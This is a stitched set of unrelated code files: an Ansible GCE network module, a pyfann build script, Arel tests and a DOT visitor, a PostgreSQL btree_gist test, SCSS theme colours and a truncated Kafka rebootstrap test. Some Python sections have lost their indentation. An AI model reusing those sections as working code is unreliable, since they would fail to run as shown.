pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.13.3"
author: Eric Johnson <erjohnso@google.com>
'''
EXAMPLES = '''
# Simple example of creating a new network
- local_action:
module: gce_net
name: privatenet
ipv4_range: '10.240.16.0/24'
# Simple example of creating a new firewall rule
- local_action:
module: gce_net
name: privatenet
fwname: all-web-webproxy
allowed: tcp:80,8080
src_tags: ["web", "proxy"]
'''
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
ResourceExistsError, ResourceNotFoundError
_ = Provider.GCE
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
def format_allowed_section(allowed):
"""Format each section of the allowed list"""
if allowed.count(":") == 0:
protocol = allowed
ports = []
elif allowed.count(":") == 1:
protocol, ports = allowed.split(":")
else:
return []
if ports.count(","):
ports = ports.split(",")
else:
ports = [ports]
return_val = {"IPProtocol": protocol}
if ports:
return_val["ports"] = ports
return return_val
def format_allowed(allowed):
"""Format the 'allowed' value so that it is GCE compatible."""
return_value = []
if allowed.count(";") == 0:
return [format_allowed_section(allowed)]
else:
sections = allowed.split(";")
for section in sections:
return_value.append(format_allowed_section(section))
return return_value
def main():
    """Ansible entry point: create or delete GCE networks and firewall rules.

    Reads module parameters, connects to GCE via libcloud, and exits
    through module.exit_json/fail_json with a JSON result including
    'changed' and 'state'.
    """
    module = AnsibleModule(
        argument_spec = dict(
            allowed = dict(),
            ipv4_range = dict(),
            fwname = dict(),
            name = dict(),
            src_range = dict(type='list'),
            src_tags = dict(type='list'),
            target_tags = dict(type='list'),
            state = dict(default='present'),
            service_account_email = dict(),
            pem_file = dict(),
            project_id = dict(),
        )
    )
    # Bail out early when the optional libcloud dependency is missing.
    if not HAS_LIBCLOUD:
        module.exit_json(msg='libcloud with GCE support (0.13.3+) required for this module')
    gce = gce_connect(module)
    allowed = module.params.get('allowed')
    ipv4_range = module.params.get('ipv4_range')
    fwname = module.params.get('fwname')
    name = module.params.get('name')
    src_range = module.params.get('src_range')
    src_tags = module.params.get('src_tags')
    target_tags = module.params.get('target_tags')
    state = module.params.get('state')
    changed = False
    json_output = {'state': state}
    if state in ['active', 'present']:
        # Look up the network first; absence is not an error here.
        network = None
        try:
            network = gce.ex_get_network(name)
            json_output['name'] = name
            json_output['ipv4_range'] = network.cidr
        except ResourceNotFoundError:
            pass
        # NOTE(review): Python 2-only "except Exception, e" syntax, used
        # throughout this module.
        except Exception, e:
            module.fail_json(msg=unexpected_error_msg(e), changed=False)
        # user wants to create a new network that doesn't yet exist
        if name and not network:
            if not ipv4_range:
                module.fail_json(msg="Missing required 'ipv4_range' parameter",
                    changed=False)
            try:
                network = gce.ex_create_network(name, ipv4_range)
                json_output['name'] = name
                json_output['ipv4_range'] = ipv4_range
                changed = True
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
        if fwname:
            # user creating a firewall rule
            if not allowed and not src_range and not src_tags:
                # A network may already have been created above; report
                # changed=True in that case so the caller knows.
                if changed and network:
                    module.fail_json(
                        msg="Network created, but missing required " + \
                            "firewall rule parameter(s)", changed=True)
                module.fail_json(
                    msg="Missing required firewall rule parameter(s)",
                    changed=False)
            allowed_list = format_allowed(allowed)
            try:
                gce.ex_create_firewall(fwname, allowed_list, network=name,
                    source_ranges=src_range, source_tags=src_tags, target_tags=target_tags)
                changed = True
            # An already-existing rule is treated as success (idempotent).
            except ResourceExistsError:
                pass
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            json_output['fwname'] = fwname
            json_output['allowed'] = allowed
            json_output['src_range'] = src_range
            json_output['src_tags'] = src_tags
            json_output['target_tags'] = target_tags
    if state in ['absent', 'deleted']:
        # Delete the firewall rule (if named) before the network, since a
        # network with rules attached cannot be removed.
        if fwname:
            json_output['fwname'] = fwname
            fw = None
            try:
                fw = gce.ex_get_firewall(fwname)
            except ResourceNotFoundError:
                pass
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            if fw:
                gce.ex_destroy_firewall(fw)
                changed = True
        if name:
            json_output['name'] = name
            network = None
            try:
                network = gce.ex_get_network(name)
                # json_output['d1'] = 'found network name %s' % name
            except ResourceNotFoundError:
                # json_output['d2'] = 'not found network name %s' % name
                pass
            except Exception, e:
                # json_output['d3'] = 'error with %s' % name
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            if network:
                # json_output['d4'] = 'deleting %s' % name
                gce.ex_destroy_network(network)
                # json_output['d5'] = 'deleted %s' % name
                changed = True
    json_output['changed'] = changed
    module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gce import *
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# Build script for the pyfann Python bindings (distutils + SWIG).
from distutils.core import setup, Extension
import glob
#from compiler.pycodegen import compileFile
#import distutils
#import distutils.sysconfig
#import distutils.core
import os
NAME='pyfann'
VERSION='2.0.0'
LONG_DESCRIPTION="""\
Fast Artificial Neural Network Library implements multilayer
artificial neural networks with support for both fully connected
and sparsely connected networks. It includes a framework for easy
handling of training data sets. It is easy to use, versatile, well
documented, and fast.
"""
#These lines are needed to circumvent a bug in distutils
# Run SWIG up front to generate pyfann/pyfann_wrap.cxx before setup() is
# invoked.  NOTE(review): Python 2-only print statement.
swig_cmd = 'swig -c++ -python pyfann/pyfann.i'
print 'Running SWIG before:', swig_cmd
os.system(swig_cmd)
#This utility function searches for files
def hunt_files(root, which):
    # Glob for `which` (e.g. "*.h") under directory `root`.
    return glob.glob(os.path.join(root, which))
setup(
    name=NAME,
    description='Fast Artificial Neural Network Library (fann)',
    long_description=LONG_DESCRIPTION,
    version=VERSION,
    author='Steffen Nissen',
    author_email='lukesky@diku.dk',
    maintainer='Gil Megidish & Vincenzo Di Massa',
    # NOTE(review): "tiscali,it" looks like a typo for "tiscali.it".
    maintainer_email='gil@megidish.net & hawk.it@tiscali,it',
    url='http://sourceforge.net/projects/fann/',
    license='GNU LESSER GENERAL PUBLIC LICENSE (LGPL)',
    py_modules=['pyfann.libfann'],
    ext_modules=[Extension('pyfann._libfann',['pyfann/pyfann_wrap.cxx'],
        include_dirs=['../src/include'],
        extra_objects=['../src/doublefann.o'],
        define_macros=[("SWIG_COMPILE",None)]
        ),
    ]
) | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true

require_relative "../helper"

module Arel
  module Nodes
    # Tests for Nodes::Or: building OR trees via #or and value equality.
    class OrTest < Arel::Spec
      describe "#or" do
        it "makes an OR node" do
          attr = Table.new(:users)[:id]
          left = attr.eq(10)
          right = attr.eq(11)
          node = left.or right
          _(node.expr.left).must_equal left
          _(node.expr.right).must_equal right

          # Chaining #or nests the previous node as the new left operand.
          oror = node.or(right)
          _(oror.expr.left).must_equal node
          _(oror.expr.right).must_equal right
        end
      end

      describe "equality" do
        # Or nodes compare by instance variables, so structurally equal
        # nodes deduplicate via Array#uniq.
        it "is equal with equal ivars" do
          array = [Or.new(["foo", "bar"]), Or.new(["foo", "bar"])]
          assert_equal 1, array.uniq.size
        end

        it "is not equal with different ivars" do
          array = [Or.new(["foo", "bar"]), Or.new(["foo", "baz"])]
          assert_equal 2, array.uniq.size
        end
      end
    end
  end
end | ruby | github | https://github.com/rails/rails | activerecord/test/cases/arel/nodes/or_test.rb |
-- int4 check
-- Exercise btree_gist's int4 opclass: run comparison and KNN-distance
-- queries first with sequential scans, then with a GiST index, so the
-- two plans can be checked for identical results.
CREATE TABLE int4tmp (a int4);
\copy int4tmp from 'data/int2.data'
-- Baseline: force sequential scans.
SET enable_seqscan=on;
SELECT count(*) FROM int4tmp WHERE a < 237;
SELECT count(*) FROM int4tmp WHERE a <= 237;
SELECT count(*) FROM int4tmp WHERE a = 237;
SELECT count(*) FROM int4tmp WHERE a >= 237;
SELECT count(*) FROM int4tmp WHERE a > 237;
-- <-> is the btree_gist distance operator (nearest neighbors of 237).
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3;
CREATE INDEX int4idx ON int4tmp USING gist ( a );
-- Repeat the same predicates with the GiST index forced.
SET enable_seqscan=off;
SELECT count(*) FROM int4tmp WHERE a < 237::int4;
SELECT count(*) FROM int4tmp WHERE a <= 237::int4;
SELECT count(*) FROM int4tmp WHERE a = 237::int4;
SELECT count(*) FROM int4tmp WHERE a >= 237::int4;
SELECT count(*) FROM int4tmp WHERE a > 237::int4;
-- Verify the KNN ordering is served by an index scan.
EXPLAIN (COSTS OFF)
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3;
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3; | sql | github | https://github.com/postgres/postgres | contrib/btree_gist/sql/int4.sql |
# frozen_string_literal: true

module Arel # :nodoc: all
  module Visitors
    # Walks an Arel AST and renders it as a Graphviz DOT digraph for
    # debugging.  Each visited object becomes a record-shaped node; each
    # attribute traversed becomes a labeled edge.
    class Dot < Arel::Visitors::Visitor
      # A rendered graph node: display name, object id, and scalar fields
      # collected from leaf values.
      class Node # :nodoc:
        attr_accessor :name, :id, :fields

        def initialize(name, id, fields = [])
          @name = name
          @id = id
          @fields = fields
        end
      end

      # A labeled edge between two Nodes; `to` is filled in lazily when
      # the target node is created or found in the seen-cache.
      class Edge < Struct.new :name, :from, :to # :nodoc:
      end

      def initialize
        super()
        @nodes = []
        @edges = []
        @node_stack = []
        @edge_stack = []
        @seen = {}
      end

      # Visit the whole tree rooted at `object`, then append the DOT
      # source to the collector.
      def accept(object, collector)
        visit object
        collector << to_dot
      end

      private
        # The visit_* methods below declare, per AST class, which
        # attributes to follow as edges.
        def visit_Arel_Nodes_Function(o)
          visit_edge o, "expressions"
          visit_edge o, "distinct"
        end

        def visit_Arel_Nodes_Unary(o)
          visit_edge o, "expr"
        end

        def visit_Arel_Nodes_Binary(o)
          visit_edge o, "left"
          visit_edge o, "right"
        end

        def visit_Arel_Nodes_UnaryOperation(o)
          visit_edge o, "operator"
          visit_edge o, "expr"
        end

        def visit_Arel_Nodes_InfixOperation(o)
          visit_edge o, "operator"
          visit_edge o, "left"
          visit_edge o, "right"
        end

        def visit__regexp(o)
          visit_edge o, "left"
          visit_edge o, "right"
          visit_edge o, "case_sensitive"
        end
        alias :visit_Arel_Nodes_Regexp :visit__regexp
        alias :visit_Arel_Nodes_NotRegexp :visit__regexp

        def visit_Arel_Nodes_Ordering(o)
          visit_edge o, "expr"
        end

        def visit_Arel_Nodes_TableAlias(o)
          visit_edge o, "name"
          visit_edge o, "relation"
        end

        def visit_Arel_Nodes_Count(o)
          visit_edge o, "expressions"
          visit_edge o, "distinct"
        end

        def visit_Arel_Nodes_ValuesList(o)
          visit_edge o, "rows"
        end

        def visit_Arel_Nodes_StringJoin(o)
          visit_edge o, "left"
        end

        def visit_Arel_Nodes_Window(o)
          visit_edge o, "partitions"
          visit_edge o, "orders"
          visit_edge o, "framing"
        end

        def visit_Arel_Nodes_NamedWindow(o)
          visit_edge o, "partitions"
          visit_edge o, "orders"
          visit_edge o, "framing"
          visit_edge o, "name"
        end

        def visit__no_edges(o)
          # intentionally left blank
        end
        alias :visit_Arel_Nodes_CurrentRow :visit__no_edges
        alias :visit_Arel_Nodes_Distinct :visit__no_edges

        def visit_Arel_Nodes_Extract(o)
          visit_edge o, "expressions"
        end

        def visit_Arel_Nodes_NamedFunction(o)
          visit_edge o, "name"
          visit_edge o, "expressions"
          visit_edge o, "distinct"
        end

        def visit_Arel_Nodes_InsertStatement(o)
          visit_edge o, "relation"
          visit_edge o, "columns"
          visit_edge o, "values"
          visit_edge o, "select"
        end

        def visit_Arel_Nodes_SelectCore(o)
          visit_edge o, "source"
          visit_edge o, "projections"
          visit_edge o, "wheres"
          visit_edge o, "windows"
          visit_edge o, "groups"
          visit_edge o, "comment"
          visit_edge o, "havings"
          visit_edge o, "set_quantifier"
          visit_edge o, "optimizer_hints"
        end

        def visit_Arel_Nodes_SelectStatement(o)
          visit_edge o, "cores"
          visit_edge o, "limit"
          visit_edge o, "orders"
          visit_edge o, "offset"
          visit_edge o, "lock"
          visit_edge o, "with"
        end

        def visit_Arel_Nodes_UpdateStatement(o)
          visit_edge o, "relation"
          visit_edge o, "wheres"
          visit_edge o, "values"
          visit_edge o, "orders"
          visit_edge o, "limit"
          visit_edge o, "offset"
          visit_edge o, "comment"
          visit_edge o, "key"
        end

        def visit_Arel_Nodes_DeleteStatement(o)
          visit_edge o, "relation"
          visit_edge o, "wheres"
          visit_edge o, "orders"
          visit_edge o, "limit"
          visit_edge o, "offset"
          visit_edge o, "comment"
          visit_edge o, "key"
        end

        def visit_Arel_Table(o)
          visit_edge o, "name"
        end

        def visit_Arel_Nodes_Casted(o)
          visit_edge o, "value"
          visit_edge o, "attribute"
        end

        def visit_Arel_Nodes_HomogeneousIn(o)
          visit_edge o, "values"
          visit_edge o, "type"
          visit_edge o, "attribute"
        end

        def visit_Arel_Attributes_Attribute(o)
          visit_edge o, "relation"
          visit_edge o, "name"
        end

        # Nodes with a `children` collection get one numbered edge per child.
        def visit__children(o)
          o.children.each_with_index do |child, i|
            edge(i) { visit child }
          end
        end
        alias :visit_Arel_Nodes_And :visit__children
        alias :visit_Arel_Nodes_Or :visit__children
        alias :visit_Arel_Nodes_With :visit__children

        # Scalar leaves don't become nodes; they are appended as fields of
        # the node currently being built.
        def visit_String(o)
          @node_stack.last.fields << o
        end
        alias :visit_Time :visit_String
        alias :visit_Date :visit_String
        alias :visit_DateTime :visit_String
        alias :visit_NilClass :visit_String
        alias :visit_TrueClass :visit_String
        alias :visit_FalseClass :visit_String
        alias :visit_Integer :visit_String
        alias :visit_BigDecimal :visit_String
        alias :visit_Float :visit_String
        alias :visit_Symbol :visit_String
        alias :visit_Arel_Nodes_SqlLiteral :visit_String

        def visit_Arel_Nodes_BindParam(o)
          visit_edge(o, "value")
        end

        def visit_ActiveModel_Attribute(o)
          visit_edge(o, "value_before_type_cast")
        end

        def visit_Hash(o)
          o.each_with_index do |pair, i|
            edge("pair_#{i}") { visit pair }
          end
        end

        def visit_Array(o)
          o.each_with_index do |member, i|
            edge(i) { visit member }
          end
        end
        alias :visit_Set :visit_Array

        def visit_Arel_Nodes_Comment(o)
          visit_edge(o, "values")
        end

        def visit_Arel_Nodes_Case(o)
          visit_edge(o, "case")
          visit_edge(o, "conditions")
          visit_edge(o, "default")
        end

        # Follow attribute `method` of `o` as a named edge.
        def visit_edge(o, method)
          edge(method) { visit o.send(method) }
        end

        # Core traversal: reuse the cached node for already-seen objects
        # (so shared subtrees render as shared nodes), otherwise create a
        # node and dispatch to the class-specific visit_* method via super.
        def visit(o)
          if node = @seen[o.object_id]
            @edge_stack.last.to = node
            return
          end

          node = Node.new(o.class.name, o.object_id)
          @seen[node.id] = node
          @nodes << node
          with_node node do
            super
          end
        end

        # Record an edge from the current node; the block visit fills in
        # the edge's target.
        def edge(name)
          edge = Edge.new(name, @node_stack.last)
          @edge_stack.push edge
          @edges << edge
          yield
          @edge_stack.pop
        end

        # Make `node` current (and the target of the in-flight edge, if
        # any) for the duration of the block.
        def with_node(node)
          if edge = @edge_stack.last
            edge.to = node
          end

          @node_stack.push node
          yield
          @node_stack.pop
        end

        # Escape double quotes for embedding in DOT label strings.
        def quote(string)
          string.to_s.gsub('"', '\"')
        end

        # Serialize collected nodes and edges into DOT source.  Fields
        # render as extra record cells (<f1>, <f2>, ...) on each node.
        def to_dot
          "digraph \"Arel\" {\nnode [width=0.375,height=0.25,shape=record];\n" +
            @nodes.map { |node|
              label = "<f0>#{node.name}"

              node.fields.each_with_index do |field, i|
                label += "|<f#{i + 1}>#{quote field}"
              end

              "#{node.id} [label=\"#{label}\"];"
            }.join("\n") + "\n" + @edges.map { |edge|
              "#{edge.from.id} -> #{edge.to.id} [label=\"#{edge.name}\"];"
            }.join("\n") + "\n}"
        end
    end
  end
end | ruby | github | https://github.com/rails/rails | activerecord/lib/arel/visitors/dot.rb |
// Theme color palette: base background/text/border colors (overridable via
// !default where declared) followed by per-component color assignments
// derived from them.
//Backgrounds colors
$bg-transparent: transparent !default;
$bg-basic-color: #ffffff !default;
$bg-basic-color-active: #cccccc !default;
$bg-light-gray: #f7f7f7 !default;
$bg-light-gray-active: #dadada !default;
// NOTE(review): some base colors below lack !default, so they cannot be
// overridden by a theme that imports this file first.
$bg-blue: #89c6cc;
$bg-blue-active: #15909c !default;
$bg-submenu: #edebeb !default;
$bg-submenu-active: #f6f6f6 !default;
$bg-black: #000;
$bg-black-active: #3d3d3d;
$bg-dark-gray: #262626;
//Text colors
$text-white: #fff !default;
$text-heading-color: #222 !default;
$text-basic: #747474 !default;
$text-basic-active: #878787 !default;
$text-blue: #89c6cc !default;
$text-blue-active: #15909c !default;
$text-submenu-active: #222 !default;
$text-disabled: #aaa !default;
$text-black: #000 !default;
$text-red: #de232f;
$text-gray: #262626;
//Border colors
$border-gray: #d2d2d2 !default;
$border-white: #ffffff !default;
$border-basic-color: #89c6cc !default;
$border-basic-active: #15909c !default;
$border-nav-submenu: #e1e1e1;
//Styles for each component separately
//Accordion
$accordion-header-bg: transparent;
$accordion-header-bg-active: transparent;
$accordion-toggled-bg: transparent;
$accordion-header-border: $border-gray;
//Breadcrumb
$breadcrumb-dropdown-bg: $bg-basic-color;
$breadcrumb-dropdown-bg-active: $bg-blue;
$breadcrumb-dropdown-text-active: $text-white;
$breadcrumb-bg: transparent;
$breadcrumb-color: $text-basic;
$breadcrumb-color-active: $text-blue-active;
//Buttons colors
$btn-green-light: #a0ce4e;
$btn-green: #92be43;
$btn-red-active: #c34e30;
$btn-red: #bc4526;
//Carousel
$carousel-bg: $bg-basic-color;
$carousel-nav: $text-black;
$carousel-nav-active: $text-basic-active;
$carousel-nav-border: $border-basic-color;
//Container component
$container-title-row-bg: $bg-light-gray;
//Event List
$event-list-bg: transparent;
$event-list-item-bg: $bg-basic-color;
$event-list-item-color: $text-basic;
$event-list-title-border: $border-basic-color;
//Calendar
$calendar-bg: $bg-basic-color;
$calendar-header-bg: $bg-basic-color-active;
$calendar-day-color-active: $text-white;
$calendar-title-color: $text-white;
//Feed
$feed-bg: transparent;
$feed-item-bg: transparent;
//Field Editor
$field-editor-bg: transparent;
$field-editor-table-border: $bg-light-gray;
$field-editor-text-header: $text-black;
$field-editor-text-header-active: $text-red;
$field-editor-text: $text-basic;
//File List
$file-list-bg: transparent;
$file-list-item-bg: transparent;
$file-list-title-color: $text-basic;
$file-list-title-border: transparent;
$file-list-item-color: $text-basic;
$file-list-item-color-active: $text-basic-active;
$file-list-item-size: $text-basic;
// NOTE(review): "borer" looks like a typo for "border"; the name is kept
// because renaming would break any stylesheet referencing it.
$file-list-item-borer: $border-basic-color;
$file-list-link-btn-color-active: $text-white;
$file-list-link-btn-color: $text-basic;
$file-list-link-btn-bg: $bg-blue-active;
$file-list-link-btn-bg-active: $bg-blue;
//Flip
$flip-bg: transparent;
$flip-slides-bg: $bg-basic-color;
$flip-slides0-bg: #f6f6f6;
$flip-slides1-bg: $bg-blue-active;
$flip-slides1-color: $text-white;
$flip-border: $border-gray;
//Gallery
$galleria-container-bg: transparent;
$gallery-info-bg: $bg-basic-color;
$gallery-info-border: $border-gray;
$gallery-info-text: $text-basic;
$gallery-nav-active: $text-white;
$gallery-nav: $text-basic;
$gallery-counter-color: $text-white;
//Language selector
$lang-selector-bg: $bg-basic-color;
$lang-selector-border: $border-basic-color;
$lang-selector-item-bg-active: $bg-basic-color;
$lang-selector-item-border: $border-white;
$lang-selector-item-border-active: $border-basic-active;
//Site selector
$site-selector-color: $text-basic;
//Link List
$link-list-bg: transparent;
$link-list-header-border: $border-basic-color;
$link-list-items-bg: transparent;
$link-list-item-bg: transparent;
$link-list-item-color: $text-basic;
$link-list-item-color-active: $text-basic-active;
$link-list-item-border-active: $border-basic-color;
//Login
$login-bg: transparent;
//Logout
$logout-bg: transparent;
$logout-link-text-color: $text-basic;
$logout-link-text-color-active: $text-basic-active;
$logout-link-border: $border-basic-color;
//Map
$map-bg: transparent;
$map-border: none;
//Page List
$page-list-bg: $bg-transparent;
$page-list-item-bg: $bg-transparent;
$page-list-item-title-text: $text-black;
$page-list-item-border: $border-basic-color;
//Pagination
$list-pagination-bg: transparent;
$list-pagination-active-bg: $bg-blue;
$list-pagination-active-color: $text-white;
// NOTE(review): the two variables above are re-declared immediately below;
// without !default the later declarations win, so the first pair is dead.
$list-pagination-active-color: $text-blue;
$list-pagination-active-bg: $bg-submenu-active;
$list-pagination-active-border: $border-basic-active;
//Play list
$play-list-bg: transparent;
$play-list-item-bg: transparent;
$play-list-item-color: $text-basic;
$play-list-item-color-active: $text-white;
$play-list-nav-active: $text-blue;
// NOTE(review): $play-list-item-bg is also declared twice (transparent
// above, light gray here); the later value wins.
$play-list-item-bg: $bg-light-gray;
$play-list-item-active-bg: $bg-blue;
$play-list-border: $border-basic-color;
$play-list-title-border: $border-basic-color;
//Promo
$promo-bg: $bg-basic-color;
$promo-bg-hero: rgba(0, 0, 0, 0.5);
$promo-border: $border-gray;
$promo-hero-text-color: $text-white;
$promo-shadow-border: $border-basic-color;
//Rich Text Content
$rich-content-bg: transparent;
$rich-content-color: $text-basic;
$rich-content-border: transparent;
$rich-content-link-color: $text-red;
$rich-content-link-color-active: $text-basic-active;
//Search
$search-filter: $text-basic;
$search-filter-border: $border-basic-color;
//Menu colors
$menu-hover-color: #1b809e;
$menu-active-color: #176f89;
//Navigation
$nav-bg: transparent;
$nav-color-root: $text-basic;
$nav-color-root-active: $text-basic;
$nav-border-root: $border-basic-color;
$nav-border-root-active: $border-basic-color;
$nav-color-submenu: $text-submenu-active;
$nav-color-submenu-active: $text-submenu-active;
$nav-bg-root: $bg-submenu-active;
$nav-bg-submenu: $bg-submenu-active;
$nav-bg-submenu-active: $bg-submenu-active;
$nav-border-submenu: $border-basic-color;
$nav-submenu-item-border: $border-gray;
$nav-submenu-border-active: $border-basic-color;
//Social Media Share
$social-media-share-bg: transparent;
//Tabs
$tab-heading-bg: $bg-light-gray;
$tab-heading-active-bg: $bg-basic-color;
$tab-heading-color: $text-heading-color;
$tab-heading-active-color: $text-black;
$tab-container-bg: transparent;
$tab-container-border: $border-basic-color;
//Title
$title-bg: transparent;
$title-color: $text-basic;
$title-color-active: $text-basic-active;
//Toggle
$toggle-header-bg: $bg-basic-color;
$toggle-content-bg: $bg-basic-color;
$toggle-show-color: $text-basic-active;
//Search Components
$search-btn-bg: transparent;
$search-btn-active-bg: #e0e0e0;
$search-btn-active-border: #adadad;
//Image component
$image-caption-color: $text-basic;
//Media Link Component
$media-link-bg: transparent;
$media-link-border: $border-basic-color;
$media-link-color: $text-basic;
$media-link-color-active: $text-basic-active;
//Tag Component
$tag-color: $text-basic;
$tag-color-active: $text-basic-active;
$tag-border-active: $border-basic-active;
$tag-link-bg: $bg-blue;
$tag-link-bg-active: $bg-blue-active;
$tag-link-color: $text-white;
//Link Component
$link-bg: transparent;
$link-text-color: $text-basic;
$link-text-color-active: $text-basic-active;
$link-border: $border-basic-color;
//Overlay
$overlay-bg: $bg-light-gray;
//Search Components
$search-title-border: $border-basic-color;
$search-title-color: $text-basic;
$search-item-color: $text-basic;
$search-item-color-active: $text-basic;
$search-item-border: $border-basic-color;
$search-item-border-active: $border-basic-active;
//
//Search Facet Summary
$search-facet-summary-border: transparent;
$search-facet-summary-background: transparent;
$search-facet-summary-item-color: $text-basic;
$search-facet-summary-item-color-horizontal: $text-basic;
$search-facet-summary-item-border: $border-gray;
$search-facet-summary-item-border-horizontal: $border-basic-color;
$search-facet-summary-item-shadow: $border-gray;
$search-facet-summary-clear-border-horizontal: $btn-red;
$search-facet-summary-clear-color: $text-red;
$search-facet-summary-clear-color-horizontal: $text-blue;
//
$search-filter-radius-active: $text-blue;
$search-filter-radius-border: $border-gray;
$search-filter-radius-bg: $border-gray;
//
$search-filter-slider-border-active: $border-basic-color;
$search-filter-slider-bg-active: $bg-blue;
$search-filter-slider-btn-border: $border-gray;
$search-filter-slider-btn-bg: $bg-light-gray;
$search-filter-slider-btn-bg-active: $bg-light-gray-active;
//Search Pagination
$search-pagination-bg: transparent;
$search-pagination-active-bg: $bg-blue;
$search-pagination-active-color: $text-white;
$search-pagination-hover-color: $text-blue;
$search-pagination-hover-bg: $bg-submenu-active;
$search-pagination-hover-border: $border-basic-active;
//Search selector
$search-selector-variant-color-active: $text-blue-active;
//Typehead
$tt-color: $text-basic;
$tt-color-active: $text-blue;
$tt-price-color: $text-blue;
$tt-dropdown-bg: $bg-light-gray;
$tt-suggestion-bg-active: $bg-light-gray-active;
$tt-dropdown-border: $border-gray;
//Video
$video-control-bg: $bg-basic-color;
$video-time-color: $text-basic;
$video-time-total-bg: $bg-black;
$video-time-handle-border: $border-gray;
$video-time-handle-bg: $bg-black;
//Form component
$form-bg: transparent;
$form-border: transparent;
$form-color: $text-basic;
//Main
$page-bg: $bg-basic-color;
$page-bg-editor: none; | unknown | github | https://github.com/vercel/next.js | examples/cms-sitecore-xmcloud/src/assets/sass/abstracts/vars/_colors.scss |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.clients;
import org.apache.kafka.clients.admin.NewTopic;
import org.apache.kafka.clients.consumer.ConsumerConfig;
import org.apache.kafka.clients.consumer.GroupProtocol;
import org.apache.kafka.clients.producer.ProducerConfig;
import org.apache.kafka.clients.producer.ProducerRecord;
import org.apache.kafka.common.TopicPartition;
import org.apache.kafka.common.config.TopicConfig;
import org.apache.kafka.common.test.ClusterInstance;
import org.apache.kafka.common.test.api.ClusterConfigProperty;
import org.apache.kafka.common.test.api.ClusterTest;
import org.apache.kafka.common.test.api.Type;
import org.apache.kafka.coordinator.group.GroupCoordinatorConfig;
import org.apache.kafka.test.TestUtils;
import java.time.Duration;
import java.util.List;
import java.util.Map;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import static org.junit.jupiter.api.Assertions.assertDoesNotThrow;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertThrows;
public class ClientRebootstrapTest {
private static final String TOPIC = "topic";
private static final int PARTITIONS = 1;
private static final int REPLICAS = 2;
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testAdminRebootstrap(ClusterInstance clusterInstance) {
var broker0 = 0;
var broker1 = 1;
var timeout = 60;
clusterInstance.shutdownBroker(broker0);
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
// Only the broker 1 is available for the admin client during the bootstrap.
assertDoesNotThrow(() -> admin.listTopics().names().get(timeout, TimeUnit.SECONDS).contains(TOPIC));
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// However, the broker 0 from the bootstrap list is online.
// Should be able to list topics again.
assertDoesNotThrow(() -> admin.listTopics().names().get(timeout, TimeUnit.SECONDS).contains(TOPIC));
}
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testAdminRebootstrapDisabled(ClusterInstance clusterInstance) {
var broker0 = 0;
var broker1 = 1;
clusterInstance.shutdownBroker(broker0);
var admin = clusterInstance.admin(Map.of(CommonClientConfigs.METADATA_RECOVERY_STRATEGY_CONFIG, "none"));
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
// Only the broker 1 is available for the admin client during the bootstrap.
assertDoesNotThrow(() -> admin.listTopics().names().get(60, TimeUnit.SECONDS).contains(TOPIC));
clusterInstance.shutdownBroker(broker1);
clusterInstance.startBroker(broker0);
// The broker 1, originally cached during the bootstrap, is offline.
// As a result, the admin client will throw a TimeoutException when trying to get list of the topics.
assertThrows(TimeoutException.class, () -> admin.listTopics().names().get(5, TimeUnit.SECONDS));
// Since the brokers cached during the bootstrap are offline, the admin client needs to wait the default timeout for other threads.
admin.close(Duration.ZERO);
}
@ClusterTest(
brokers = REPLICAS,
types = {Type.KRAFT},
serverProperties = {
@ClusterConfigProperty(key = TopicConfig.UNCLEAN_LEADER_ELECTION_ENABLE_CONFIG, value = "true"),
@ClusterConfigProperty(key = GroupCoordinatorConfig.OFFSETS_TOPIC_REPLICATION_FACTOR_CONFIG, value = "2")
}
)
public void testProducerRebootstrap(ClusterInstance clusterInstance) throws ExecutionException, InterruptedException {
try (var admin = clusterInstance.admin()) {
admin.createTopics(List.of(new NewTopic(TOPIC, PARTITIONS, (short) REPLICAS)));
}
var broker0 = 0;
var broker1 = 1;
// It's ok to shut the leader down, cause the reelection is small enough to the producer timeout.
clusterInstance.shutdownBroker(broker0);
try (var producer = clusterInstance.producer()) {
